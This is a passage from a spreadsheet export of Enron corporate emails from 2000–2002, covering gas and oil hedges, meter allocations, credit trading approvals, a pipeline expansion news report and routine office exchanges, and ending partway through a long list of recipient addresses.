HAVE A GOOD DAY!_x000D_
LETS TALK ABOUT 2:30._x000D_
_x000D_
	SEE YA!_x000D_
	SWIG_x000D_
 -----Original Message-----_x000D_
From: 	Legler, Michael   On Behalf Of Michael J Legler/HOU/ECT@ENRON_x000D_
Sent:	Tuesday, April 17, 2001 8:41 AM_x000D_
To:	Schwieger, Jim_x000D_
Subject:	ENE_x000D_
_x000D_
2 cents better than expected is good!!!_x000D_
Did you get in yesterday??_x000D_
Go ENE go!!</t>
  </si>
  <si>
    <t>Thu, 24 May 2001 10:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: KCS II Hedge</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
_x000D_
_x000D_
Teresa G. Bushman_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3835A_x000D_
Houston, TX  77002_x000D_
(713) 853-7895_x000D_
fax (713) 646-3393_x000D_
teresa.g.bushman@enron.com_x000D_
_x000D_
_x000D_
----- Forwarded by Teresa G Bushman/HOU/ECT on 05/24/2001 05:10 PM -----_x000D_
_x000D_
	Marshall Eubank/ENRON@enronXgate_x000D_
	05/24/2001 05:06 PM_x000D_
		 _x000D_
		 To: Marshall Eubank/ENRON@enronXgate, C John Thompson/ENRON@enronXgate, Joan _x000D_
Quick/ENRON@enronXgate, Tricia Spence/ENRON@enronXgate, Avinash _x000D_
Jain/ENRON@enronXgate, Brian Otis/ENRON@enronXgate, Shirley A _x000D_
Hudler/ENRON@enronXgate, Tim Proffitt/ENRON@enronXgate, Teresa G _x000D_
Bushman/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: RE: KCS II Hedge_x000D_
_x000D_
$26.30 / Bbl _x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Eubank, Marshall  _x000D_
Sent: Thursday, May 24, 2001 4:56 PM_x000D_
To: Thompson, C. John; Quick, Joan; Spence, Tricia; Jain, Avinash; Otis, _x000D_
Brian; Hudler, Shirley A.; Proffitt, Tim; Bushman, Teresa_x000D_
Subject: KCS II Hedge_x000D_
_x000D_
_x000D_
KCS hedged 2 years of production beginning June 01 - May 03 for the proposed _x000D_
VPP._x000D_
_x000D_
The price was $4.255/MMBTU on 4,974,364 MMbtus and $26.00/Bbl on 70,164 _x000D_
barrels of oil (to be confirmed)_x000D_
_x000D_
Fred LaGrasta's deal with credit and KCS is:_x000D_
_x000D_
(1) ENA has the right to unwind if VPP does not close on or before June 15th _x000D_
and if gain, 25% of the gain to ENA, pursuant to ECR term sheet_x000D_
(2) if legal renders existing netting agreement invalid, then KCS will have _x000D_
to post margin if prices move up and KCS payable to ENA exceeds $250M._x000D_
_x000D_
Marshall</t>
  </si>
  <si>
    <t>Tue, 17 Oct 2000 07:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>meter 5892 South Katy Gas Unit 2- Allocation</t>
  </si>
  <si>
    <t xml:space="preserve">JM, _x000D_
_x000D_
Is the contract for this deal still valid?  I want to roll the deal for Sep _x000D_
and Oct._x000D_
_x000D_
D_x000D_
---------------------- Forwarded by Daren J Farmer/HOU/ECT on 10/17/2000 _x000D_
02:29 PM ---------------------------_x000D_
_x000D_
_x000D_
Mark McCoy@ENRON_x000D_
10/17/2000 01:34 PM_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: meter 5892 South Katy Gas Unit 2- Allocation_x000D_
_x000D_
Daren---_x000D_
_x000D_
I need some help with meter 5892 for September 00 due to a feedback error.  _x000D_
Deal 133196 (purchase from Duke on gathering contract) is erroring out due to _x000D_
it's expiration date of 8/31/00......however it still showed up in POPS (w/o _x000D_
a nom) on 9/1.  Volume management allocated volume to it according to the _x000D_
allocation statement.  Should this deal be extended?  I noticed it is not out _x000D_
there for October either.  I have the feedback error sheet &amp; allocation if _x000D_
you want to see them._x000D_
_x000D_
Let me know,_x000D_
_x000D_
Mark_x000D_
x33396_x000D_
_x000D_
_x000D_
p.s. Fred Boas said you used to handle this and you were very wise in the art _x000D_
of allocation......so I am expecting big results Grasshopper!_x000D_
</t>
  </si>
  <si>
    <t>Wed, 3 Jan 2001 10:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'peter.berzins@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'louise.kitchen@enron.com', 'jeffrey.mcmahon@enron.com', 'raymond.bowen@enron.com', 'greg.piper@enron.com', 'bryan.burnett@enron.com', 'marc.eichmann@enron.com', 'philippe.bibi@enron.com', 'greg.whalley@enron.com', 'bob.crane@enron.com'})</t>
  </si>
  <si>
    <t>Clickpaper report for 12/20/00 to 1/2/01</t>
  </si>
  <si>
    <t>If you have any questions regarding this report, please contact Pete Berzins _x000D_
at x57597._x000D_
_x000D_
Thanks,_x000D_
Pete_x000D_
EnronOnline</t>
  </si>
  <si>
    <t>Mon, 22 May 2000 08:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Credit Trading - Approval Form</t>
  </si>
  <si>
    <t xml:space="preserve">I think that the "general policies" route is the right (and only) one - _x000D_
particularly for the vast number of reference entities envisaged.  From a _x000D_
legal sign off perspective, we should be able to give the immediate all _x000D_
clear, provided_x000D_
in the case of a ref entity, that it is not an existing customer/counterparty _x000D_
of Enron (if it is we'll need to check confidentiality agreements etc).  _x000D_
We'll need to work out the quickest way of establishing this (but it is not _x000D_
per se a legal task)_x000D_
in the case of a ref entity, that we have carried out the necessary the legal _x000D_
due diligence in its country of establishment/location_x000D_
in the case of a counterparty, that we have carried out the necessary legal _x000D_
due diligence in its country of establishment/location_x000D_
_x000D_
Of course our legal due diligence may require us to take additional steps in _x000D_
the case of some countries/counterparties, but we will address these steps as _x000D_
generically as possible.  _x000D_
_x000D_
Hope this gives a sense of where we're coming from.  Please call me to _x000D_
discuss further if need be._x000D_
_x000D_
Paul_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Tomas Valnek_x000D_
22/05/2000 10:44_x000D_
To: Bryan Seyfried/LON/ECT@ECT_x000D_
cc: William S Bradford/HOU/ECT@ECT, Denis O'Connell/LON/ECT@ECT, Paul _x000D_
Simons/LON/ECT@ECT, Debbie R Brackett/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, _x000D_
Rod Nelson/HOU/ECT@ECT, Edmund Cooper/LON/ECT@ECT, Tana Jones/HOU/ECT@ECT, _x000D_
ECT London Credit Trading _x000D_
_x000D_
Subject: Re: Credit Trading - Approval Form  _x000D_
_x000D_
I agree that the current Word document approval form will not be very _x000D_
practical once we scale up. Going forward, we could be looking at some kind _x000D_
of database solution as implemented for EnronOnline._x000D_
_x000D_
TV_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Bryan Seyfried_x000D_
20/05/2000 13:09_x000D_
To: Tomas Valnek/LON/ECT@ECT_x000D_
cc: William S Bradford/HOU/ECT@ECT, Denis O'Connell/LON/ECT@ECT, Paul _x000D_
Simons/LON/ECT@ECT, Debbie R Brackett/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, _x000D_
Rod Nelson/HOU/ECT@ECT, Edmund Cooper/LON/ECT@ECT, Tana Jones/HOU/ECT@ECT, _x000D_
ECT London Credit Trading _x000D_
_x000D_
Subject: Re: Credit Trading - Approval Form  _x000D_
_x000D_
Although this makes a lot of sense, how are going to implement it?  We plan _x000D_
to scale massively and I cannot imagine that this will be efficient enough to _x000D_
facilitate the time frames and number of reference credits that we are _x000D_
anticipating.  I think that we need to have a general policy that we can look _x000D_
to instead of approving them on a one off basis._x000D_
_x000D_
Let's discuss_x000D_
_x000D_
_x000D_
_x000D_
Tomas Valnek_x000D_
19/05/2000 11:42_x000D_
To: ECT London Credit Trading, Denis O'Connell/LON/ECT@ECT, Tana _x000D_
Jones/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Paul Simons/LON/ECT@ECT, Edmund _x000D_
Cooper/LON/ECT@ECT, William S Bradford/HOU/ECT@ECT, Debbie R _x000D_
Brackett/HOU/ECT@ECT, Rod Nelson/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Credit Trading - Approval Form_x000D_
_x000D_
Attached is an Approval Form that will have to be completed to request if we _x000D_
want to trade with a new counterparty or on a new reference credit. I have _x000D_
incorporated comments from Origination, Credit and Legal. But should you have _x000D_
any further comments please let me know ASAP, as I plan to introduce this _x000D_
form by the middle of next week. (Note that there will be two forms, one for _x000D_
bankruptcy swaps and one for other credit derivatives.)_x000D_
_x000D_
Regards_x000D_
_x000D_
Tomas_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Mar 2001 02:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Kern River Expansion - Implications for Firm Shippers</t>
  </si>
  <si>
    <t>In case you haven't seen the trade press reports:_x000D_
_x000D_
NGI's Daily Gas Price Index _x000D_
published : March 13, 2001_x000D_
Kern Plans Emergency Expansion for California_x000D_
_x000D_
In response to the "urgent" need for additional gas supplies to serve _x000D_
California's electric generation markets this summer, Kern River Gas _x000D_
Transmission has announced an emergency open season for 135,000 Dth/d firm _x000D_
transportation service expected to be available by July 1. _x000D_
_x000D_
"It would mean the fast track through FERC and getting all the environmental _x000D_
permits in three-and-a-half months," said spokeswoman Bev Chipman. "It would _x000D_
be quicker than ever before. We've already spoken with FERC. They are very _x000D_
interested, and we are very interested to entertain this possibility." _x000D_
_x000D_
FERC Chairman Curt Hebert told the House Energy and Air Quality subcommittee _x000D_
last week that the Commission was committed to moving rapidly on any projects _x000D_
designed to move gas to California. _x000D_
_x000D_
Williams, which already has one expansion on file and another on the way, is _x000D_
proposing this project as an emergency solution to California's power crisis. _x000D_
The $81 million project would be finalized by April 2 based on whether the _x000D_
necessary permits and licenses for construction have been obtained. Williams _x000D_
could cancel the project if expansion capacity is not fully subscribed. _x000D_
_x000D_
A portion of the emergency facilities may be incorporated into Williams' 2002 _x000D_
California Expansion Project, which is currently on file at FERC, or its 2003 _x000D_
New Generation Expansion Project, which recently underwent an open season. _x000D_
Several temporary facility installations would be removed once the other two _x000D_
permanent expansions were in place and in service. _x000D_
_x000D_
"In response to FERC and to the state of California we have located available _x000D_
compression equipment that we could have on site nearly immediately, and _x000D_
we've come up with a proposal to place those compression units on the very _x000D_
same sites we will be using for our permanent expansions," said Kirk Morgan, _x000D_
director of business development for Williams Gas Pipeline West. "FERC _x000D_
already has an application in front of them that deals with the site _x000D_
locations. These are different units so there are different air quality _x000D_
impacts, but we're hoping that those sites can be permitted very _x000D_
expeditiously...." Williams said the facilities would include modifications _x000D_
to three existing compressor stations, installation of three new compressor _x000D_
stations and expansion of a meter station. _x000D_
_x000D_
The open season only runs through noon Thursday. There are two blocks of _x000D_
capacity that will be available starting July 1: one for 110,000 Dth/d that _x000D_
runs through April 30, 2002 and another for 21,000 Dth/d that runs through _x000D_
April 30, 2003. Shippers interested in service should submit a request for _x000D_
service that includes the shipper's commitment to accept and Williams' _x000D_
commitment to provide firm transportation service that includes, among other _x000D_
things, an executed binding precedent agreement and a statement confirming _x000D_
the ability to meet Williams' creditworthiness in its FERC gas tariff and _x000D_
policy. Other requirements can be found on the web site at _x000D_
http://www.williams.com or by contacting Bev Chipman at (801)584-7048. _x000D_
_x000D_
I thought it was also interesting that, in the press release posted on the _x000D_
Williams web site, Kern says it will only entertain one request per customer _x000D_
for each of the two packages being offered.  Our usual strategy, I believe, _x000D_
is to submit several bids at different levels.</t>
  </si>
  <si>
    <t>Wed, 9 Aug 2000 01:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'camille.gerard@enron.com'})</t>
  </si>
  <si>
    <t>Re: National Gypsum</t>
  </si>
  <si>
    <t xml:space="preserve">What is this attached list?  Have I seen it before?_x000D_
_x000D_
_x000D_
_x000D_
	Camille Gerard@ENRON_x000D_
	08/08/2000 06:07 PM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: Jarrod Cyprow/HOU/ECT@ECT_x000D_
		 Subject: National Gypsum_x000D_
_x000D_
Tana, _x000D_
I see that National is pre-approved in Credit but I want to make sure_x000D_
that Legal is covered.  I think that it will be but just in case the CP ID_x000D_
is 26316. _x000D_
Thanks._x000D_
Camille_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 29 Sep 2000 07:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE:!</t>
  </si>
  <si>
    <t xml:space="preserve">Is that so?!_x000D_
Well, I think you are quite a catch!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Craig Lindberg &lt;craigl@calpine.com&gt; on 09/29/2000 01:52:49 PM_x000D_
To: "'Susan.Scott@enron.com'" &lt;Susan.Scott@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: RE:_x000D_
_x000D_
_x000D_
_x000D_
Susan,_x000D_
_x000D_
I just thought know should know - you have me hook, line and sinker!_x000D_
_x000D_
Looking forward to seeing you tonight._x000D_
_x000D_
Craig_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 29 Mar 2001 10:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>You won't believe it - don't open this if you don't want to..</t>
  </si>
  <si>
    <t>Hi Carlos,_x000D_
_x000D_
Jake called and said he wants to sign up Delta tomorrow (Friday).  I had a _x000D_
conference call with John, Carolyn and Rick Vincens, and we are pushing _x000D_
forward.  If you read this, could you tell me about any critical issues.  _x000D_
Also, has there been a risk memo started, and has Accounting signed off on _x000D_
the structure?_x000D_
_x000D_
I'll get up to speed on this during the evening, and will take your deal toy _x000D_
when the deal is done._x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Tue, 12 Feb 2002 14:40:04 -0800 (PST)</t>
  </si>
  <si>
    <t>reg affairs can provide you a copy.   Thanks, Kim._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Wadle, Susan  _x000D_
Sent:	Tuesday, February 12, 2002 3:27 PM_x000D_
To:	Watson, Kimberly_x000D_
Subject:	_x000D_
Importance:	High_x000D_
_x000D_
Kim, Eric is borrowing Kevin Hyatt's TW Tariffs (small) binder.  He has asked me to try to get one for him.  Does someone supply those or do I just need to have it reproduced for him. _x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Thu, 4 Oct 2001 15:45:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bob.ambrocik@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'basem.khuri@enron.com', 'guy.dayvault@enron.com', 'andres.balmaceda@enron.com', 'xtrain10@enron.com', 'chad.plotkin@enron.com', 'carol.chew@enron.com', 'control.presentation@enron.com', 'jay.reitmeyer@enron.com', 'myint.oo@enron.com', 'frank.ermis@enron.com', 'danielle.stephens@enron.com', 'cynthia.rivers@enron.com', 'dan.mccairns@enron.com', 'harris.hameed@enron.com', 'chris.wiebe@enron.com', 'grant.gilmour@enron.com', 'chris.constantine@enron.com', 'gary.taylor@enron.com', 'david.delainey@enron.com', 'j.swiber@enron.com', 'james.armstrong@enron.com', 'jeff.andrews@enron.com', 'a..price@enron.com', 'harry.arora@enron.com', 'jeff.richter@enron.com', 'daniel.diamond@enron.com', 'denver.plachy@enron.com', 'greg.brazaitis@enron.com', 'jeremy.blachman@enron.com', 'brad.snyder@enron.com', 'greg.woulfe@enron.com', 'joe.hunter@enron.com', 'ana.agudelo@enron.com', 'edward.brady@enron.com', 'cathy.sprowls@enron.com', 'gopalakrishnan.subramaniam@enron.com', 'edward.ray@enron.com', 'bianca.ornelas@enron.com', 'cindy.irvin@enron.com', 'john.godbold@enron.com', 'benjamin.chi@enron.com', 'garland.lynn@enron.com', 'darrell.williamson@enron.com', 'betty.chan@enron.com', 'john.allario@enron.com', 'deborah.long@enron.com', 'bryan.lari@enron.com', 'bernice.rodriguez@enron.com', 'bill.white@enron.com', 'hugo.moreira@enron.com', 'jeff.king@enron.com', 'george.mcclellan@enron.com', 'chelsea.bardal@enron.com', 'ellen.wallumrod@enron.com', 'aaron.jang@enron.com', 'doug.leach@enron.com', 'hans.wong@enron.com', 'gary.hickerson@enron.com', 'geoff.storey@enron.com', 'homer.lin@enron.com', 'brian.evans@enron.com', 'xtrain04@enron.com', 'george.nguyen@enron.com', 'jim.brysch@enron.com', 'andrea.ring@enron.com', 'h..lewis@enron.com', 'cella.amerson@enron.com', 'charlie.hoang@enron.com', 'david.oliver@enron.com', 'bridgette.anderson@enron.com', 'bob.ambrocik@enron.com', 'g..newman@enron.com', 'dortha.gray@enron.com', 'amitava.dhar@enron.com', 'a..casas@enron.com', 'amy.cavazos@enron.com', 'cassandra.schultz@enron.com', 'hilda.lindley@enron.com', 'biliana.pehlivanova@enron.com', 'david.michels@enron.com', 'andy.zipper@enron.com', 'curtis.reister@enron.com', 'chance.rabon@enron.com', 'david.fairley@enron.com', 'bryan.rivera@enron.com', 'jane.joyce@enron.com', 'ingrid.martin@enron.com', 'john.allison@enron.com', 'a..lopez@enron.com', 'corbett.barr@enron.com', 'barry.tycholiz@enron.com', 'jeffrey.jackson@enron.com', 'frank.karbarz@enron.com', 'christina.sanchez@enron.com', 'christopher.schweigart@enron.com', 'adam.metry@enron.com', 'geynille.dillingham@enron.com', 'jennifer.fraser@enron.com', 'brandon.wax@enron.com', 'hai.chen@enron.com', 'eric.bass@enron.com', 'genaro.mendoza@enron.com', 'george.breen@enron.com', 'arvindh.kumar@enron.com', 'james.post@enron.com', 'adriana.peterson@enron.com', 'gloria.guo@enron.com', 'bob.crane@enron.com', 'bryan.hull@enron.com', 'jeffery.parker@enron.com', 'chris.behney@enron.com', 'george.huan@enron.com', 'brian.fogarty@enron.com', 'jie.ji@enron.com', 'jeff.royed@enron.com', 'eric.moon@enron.com', 'giri.padavala@enron.com', 'andrew.miles@enron.com', 'gina.woloszyn@enron.com', 'chris.ordway@enron.com', 'anthony.mends@enron.com', 'elena.chilkina@enron.com', 'carol.essig@enron.com', 'carole.frank@enron.com', 'florence.zoes@enron.com', 'carlos.torres@enron.com', '#24.training@enron.com', 'jonathan.mckay@enron.com', 'jad.doan@enron.com', 'jurgen.hess@enron.com', 'diane.anderson@enron.com', 'jeffrey.molinaro@enron.com', 'gabriel.monroy@enron.com', 'n.chen@enron.com', 'eric.groves@enron.com', 'ciby.mathew@enron.com', 'gregory.lind@enron.com', 'alan.wright@enron.com', 'jody.crook@enron.com', 'chrishelle.berell@enron.com', 'greg.whalley@enron.com', 'eric.feitler@enron.com', 'david.samuelson@enron.com', 'angela.liknes@enron.com', 'adam.tyrrell@enron.com', 'clayton.vernon@enron.com', 'dale.surbey@enron.com', 'chuck.wilkinson@enron.com', 'xtrain07@enron.com', 'derek.wilson@enron.com', 'darren.vanek@enron.com', 'adriana.mendez@enron.com', 'gail.kettenbrink@enron.com', 'donald.sutton@enron.com', 'jim.cole@enron.com', 'dung.tran@enron.com', 'james.hungerford@enron.com', 'diana.andel@enron.com', 'heather.alon@enron.com', 'christopher.godward@enron.com', 'emily.adamo@enron.com', 'ashraf.ayyat@enron.com', 'eddie.shaw@enron.com', 'jill.hopson@enron.com', 'carol.carter@enron.com', 'sabina.rank@enron.com', 'gurmeet.kudhail@enron.com', 'fred.lagrasta@enron.com', 'm..galan@enron.com', 'bryan.deluca@enron.com', 'brad.morse@enron.com', 'bryan.critchfield@enron.com', 'adam.plager@enron.com', 'araceli.romero@enron.com', 'p.hewes@enron.com', 'cindy.horn@enron.com', 'brian.davis@enron.com', 'garrett.ashmore@enron.com', 'jan-erland.bekeng@enron.com', 'andy.walker@enron.com', 'john.greene@enron.com', 'cyndie.balfour-flanagan@enron.com', 'chris.germany@enron.com', 'eva.tow@enron.com', 'aparna.rajaram@enron.com', 'david.coleman@enron.com', 'hal.bertram@enron.com', 'bilal.khaleeq@enron.com', 'dayem.khandker@enron.com', 'jonathan.lennard@enron.com', 'julie.ferrara@enron.com', 'cindy.olson@enron.com', 'john.henderson@enron.com', 'jason.mcnair@enron.com', 'audrey.cook@enron.com', 'jeff.gamblin@enron.com', 'jason.garvey@enron.com', 'castlen.moore@enron.com', 'arvel.martin@enron.com', 'derek.anderson@enron.com', 'dimitri.taylor@enron.com', 'denae.umbower@enron.com', 'jeanette.reese@enron.com', 'courtney.mcmillian@enron.com', 'chad.clark@enron.com', 'bruce.harris@enron.com', 'emilio.vicens@enron.com', 'john.kratzer@enron.com', 'jana.mills@enron.com', 'darin.schmidt@enron.com', 'bryan.aubuchon@enron.com', 'frank.hoogendoorn@enron.com', 'george.mccormick@enron.com', 'brenda.cassel@enron.com', 'gabriel.gonzalez@enron.com', 'harold.hickman@enron.com', 'david.fisher@enron.com', 'digna.showers@enron.com', 'elspeth.inglis@enron.com', 'frank.prejean@enron.com', 'gina.zambrano@enron.com', 'bryce.baxter@enron.com', 'al.pollard@enron.com', 'xtrain09@enron.com', 'jim.newgard@enron.com', 'colleen.sullivan@enron.com', 'dianne.ripley@enron.com', 'j.bagwell@enron.com', 'francis.bui@enron.com', 'joe.quenet@enron.com', 'adarsh.vakharia@enron.com', 'david.karr@enron.com', 'ding.yuan@enron.com', 'greg.couch@enron.com', 'brandon.oliveira@enron.com', 'elizabeth.webb@enron.com', 'angela.mendez@enron.com', 'daryll.fuentes@enron.com', 'ina.norman@enron.com', 'amy.jones@enron.com', 'clayton.seigle@enron.com', 'dishni.muthucumarana@enron.com', 'jared.kaiser@enron.com', 'dipak.agarwalla@enron.com', 'fred.cohagan@enron.com', 'crystal.hyde@enron.com', 'george.hopley@enron.com', 'john.buchanan@enron.com', 'joe.errigo@enron.com', 'ivan.liu@enron.com', 'edgar.castro@enron.com', 'beatrice.reyna@enron.com', 'beverley.whittingham@enron.com', 'jeff.nogid@enron.com', 'alexandru.tudor@enron.com', 'xtrain05@enron.com', 'cory.willis@enron.com', 'john.alvar@enron.com', 'ellen.su@enron.com', 'darryn.graham@enron.com', 'c..giron@enron.com', 'eric.saibi@enron.com', 'xtrain02@enron.com', 'jona.kimbrough@enron.com', 'heather.dunton@enron.com', 'agustin.perez@enron.com', 'dan.prudenti@enron.com', 'andrew.potter@enron.com', 'eric.boyt@enron.com', 'chris.potter@enron.com', 'john.massey@enron.com', 'jennifer.lee@enron.com', 'clarissa.garcia@enron.com', 'deborah.merril@enron.com', 'barry.pearce@enron.com', 'carrie.southard@enron.com', 'ann.osire@enron.com', 'gerald.gilbert@enron.com', 'l..hernandez@enron.com', 'gary.law@enron.com', 'gregory.schockling@enron.com', 'david.cox@enron.com', 'darryl.kendrick@enron.com', 'karima.husain@enron.com', 'jeff.lewis@enron.com', 'greg.trefz@enron.com', 'hans.jathanna@enron.com', 'greg.carlson@enron.com', 'jesse.cline@enron.com', '#26.training@enron.com', 'erin.willis@enron.com', 'clint.dean@enron.com', 'antoinette.beale@enron.com', 'bridget.fraser@enron.com', 'don.baughman@enron.com', 'hal.mckinney@enron.com', 'jim.fallon@enron.com', 'amit.lal@enron.com', 'barbara.weidman@enron.com', 'john.arnold@enron.com', 'v..reed@enron.com', 'chuan.ong@enron.com', 'joel.bennett@enron.com', 'christian.yoder@enron.com', 'deirdre.mccaffrey@enron.com', 'janet.dietrich@enron.com', 'anteneh.shimelis@enron.com', 'evelyn.metoyer@enron.com', 'christopher.daniel@enron.com', 'david.maxwell@enron.com', 'juana.fayett@enron.com', 'christopher.watts@enron.com', 'erik.simpson@enron.com', 'angela.barnett@enron.com', 'christopher.mulcahy@enron.com', 'barbara.cook@enron.com', 'israel.estrada@enron.com', 'alan.engberg@enron.com', 'diana.cioffi@enron.com', 'julie.cobb@enron.com', 'battista.psenda@enron.com', 'darren.mcnair@enron.com', 'justin.day@enron.com', 'craig.joplin@enron.com', 'cathy.de@enron.com', 'blair.sandberg@enron.com', 'jaimie.jessop@enron.com', 'junaid.khanani@enron.com', 'daniel.kang@enron.com', 'jenny.latham@enron.com', 'm..docwra@enron.com', 'christopher.connolly@enron.com', 'john.best@enron.com', 'brian.fogherty@enron.com', 'evelyn.aucoin@enron.com', 'david.wile@enron.com', 'conal.tackney@enron.com', 'calvin.lee@enron.com', 'darrell.aguilar@enron.com', 'akhil.khanijo@enron.com', 'hillary.mack@enron.com', 'horace.snyder@enron.com', 'christy.lobusch@enron.com', 'erika.breen@enron.com', 'dan.metts@enron.com', 'jim.liu@enron.com', 'elliott.katz@enron.com', 'christina.mendoza@enron.com', 'charles.brewer@enron.com', 'binh.pham@enron.com', 'donnie.hall@enron.com', 'erik.hokmark@enron.com', 'bo.petersen@enron.com', 'joe.gordon@enron.com', 'jonathan.hoff@enron.com', 'angela.mcculloch@enron.com', 'jonathan.horne@enron.com', 'david.hardy@enron.com', 'l..nowlan@enron.com', 'geoff.guenther@enron.com', 'gail.tholen@enron.com', 'britt.whitman@enron.com', 'enrique.lenci@enron.com', 'e.bowman@enron.com', 'adam.caldwell@enron.com', '#23.training@enron.com', 'david.baumbach@enron.com', 'daniel.lisk@enron.com', 'grant.patterson@enron.com', 'brant.reves@enron.com', 'chris.connelly@enron.com', 'dennis.benevides@enron.com', 'joon.choe@enron.com', 'jonathan.heinlen@enron.com', '#30.training@enron.com', 'damon.mccauley@enron.com', 'andy.chun@enron.com', 'edward.sacks@enron.com', 'hakeem.ogunbunmi@enron.com', 'joseph.hirl@enron.com', 'bill.kefalas@enron.com', 'gladys.tan@enron.com', 'jim.goughary@enron.com', 'iain.greig@enron.com', 'angie.zeman@enron.com', 'christopher.cocks@enron.com', 'jason.kilgo@enron.com', 'jd.buss@enron.com', 'alex.wong@enron.com', 'xtrain03@enron.com', 'han.goh@enron.com', 'frank.cernosek@enron.com', 'debbie.nicholls@enron.com', 'john.defenbaugh@enron.com', 'daniele.crelin@enron.com', 'christopher.spears@enron.com', 'danny.clark@enron.com', 'john.mcpherson@enron.com', 'chris.gaskill@enron.com', 'caron.stark@enron.com', 'jeff.skilling@enron.com', 'brian.eoff@enron.com', 'glenn.rogers@enron.com', 'y..resendez@enron.com', 'guy.freshwater@enron.com', 'amy.bundscho@enron.com', 'danial.hornbuckle@enron.com', 'diane.salcido@enron.com', 'iris.mack@enron.com', 'cynthia.shoup@enron.com', 'brian.gillis@enron.com', 'brad.mckay@enron.com', 'dutch.quigley@enron.com', 'g..taylor@enron.com', 'claire.wright@enron.com', 'carey.mansfield@enron.com', 'jennifer.cutaia@enron.com', 'cora.pendergrass@enron.com', 'daniel.haynes@enron.com', 'john.cassidy@enron.com', 'elizabeth.shim@enron.com', 'jenny.helton@enron.com', 'jay.knoblauh@enron.com', 'anna.santucci@enron.com', 'alisha.guerrero@enron.com', 'charlie.jiang@enron.com', 'donna.scott@enron.com', 'anthony.campos@enron.com', 't..adams@enron.com', 'donald.graves@enron.com', 'daniel.brown@enron.com', 'ina.rangel@enron.com', 'cybele.henriquez@enron.com', 'chris.sloan@enron.com', 'andrew.moth@enron.com', 'justin.cornett@enron.com', 'ebony.watts@enron.com', 'angela.chen@enron.com', 'carl.mitchell@enron.com', 'alfonso.trabulsi@enron.com', 'darla.saucier@enron.com', 'geoffrey.allen@enron.com', 'daniel.falcone@enron.com', 'gallin.fortunov@enron.com', 'arun.balasundaram@enron.com', 'heather.purcell@enron.com', 'george.kubove@enron.com', 'chris.mallory@enron.com', 'carrie.slagle@enron.com', 'ahmad.farooqi@enron.com', 'andrew.hill@enron.com', 'banu.ozcan@enron.com', 'george.chapa@enron.com', 'amanda.schultz@enron.com', 'cathy.wang@enron.com', 'john.chismar@enron.com', 'brad.richter@enron.com', 'francis.gonzales@enron.com', 'heather.kroll@enron.com', 'hong.yu@enron.com', 'brent.johnston@enron.com', 'david.stadnick@enron.com', 'john.griffith@enron.com', 'jon.henderlong@enron.com', 'craig.breslau@enron.com', 'daniel.presley@enron.com', 'elizabeth.navarro@enron.com', 'cecilia.cheung@enron.com', 'julie.sarnowski@enron.com', 'denise.furey@enron.com', 'ben.lockman@enron.com', 'fran.chang@enron.com', 'andrew.burns@enron.com', 'darren.delage@enron.com', 'brenna.neves@enron.com', 'christine.dinh@enron.com', 'k..patton@enron.com', 'xtrain06@enron.com', 'judy.hernandez@enron.com', 'chonawee.supatgiat@enron.com', 'bryan.burch@enron.com', 'bob.kinsella@enron.com', 'john.kinser@enron.com', 'bobbi.tessandori@enron.com', 'fred.mitro@enron.com', 'moi.eng@enron.com', 'angeles.beltri@enron.com', 'carol.kowdrysh@enron.com', 'ian.cooke@enron.com', 'john.jahnke@enron.com', 'emily.neyra-helal@enron.com', 'elsa.piekielniak@enron.com', 'ajit.dhansinghani@enron.com', 'dana.davis@enron.com', 'amie.ha@enron.com', 'brent.tiner@enron.com', 'faheem.qavi@enron.com', 'john.coyle@enron.com', 'farid.mithani@enron.com', 'doyle.johnson@enron.com', 'brooke.reid@enron.com', 'bernard.dahanayake@enron.com', 'alton.honore@enron.com', 'chetan.paipanandiker@enron.com', 'debny.greenlee@enron.com', 'don.black@enron.com', 'c..aucoin@enron.com', 'cephus.gunn@enron.com', 'don.bates@enron.com', 'eugenio.perez@enron.com', 'dana.smith@enron.com', 'frank.hayden@enron.com', 'jason.choate@enron.com', 'adam.stevens@enron.com', 'celeste.cisneros@enron.com', 'carolyn.gilley@enron.com', 'aaron.armstrong@enron.com', 'ei.dumayas@enron.com', 'debbie.moseley@enron.com', 's..shively@enron.com', 'jeff.cobb@enron.com', 'barbara.sargent@enron.com', 'jason.harding@enron.com', 'beth.cowan@enron.com', 'ed.mcmichael@enron.com', 'glenn.matthys@enron.com', 'christian.lebroc@enron.com', 'david.mally@enron.com', 'daniel.reck@enron.com', 'carolina.waingortin@enron.com', 'n..gilbert@enron.com', 'chris.sonneborn@enron.com', 'david.berberian@enron.com', 'jozef.lieskovsky@enron.com', 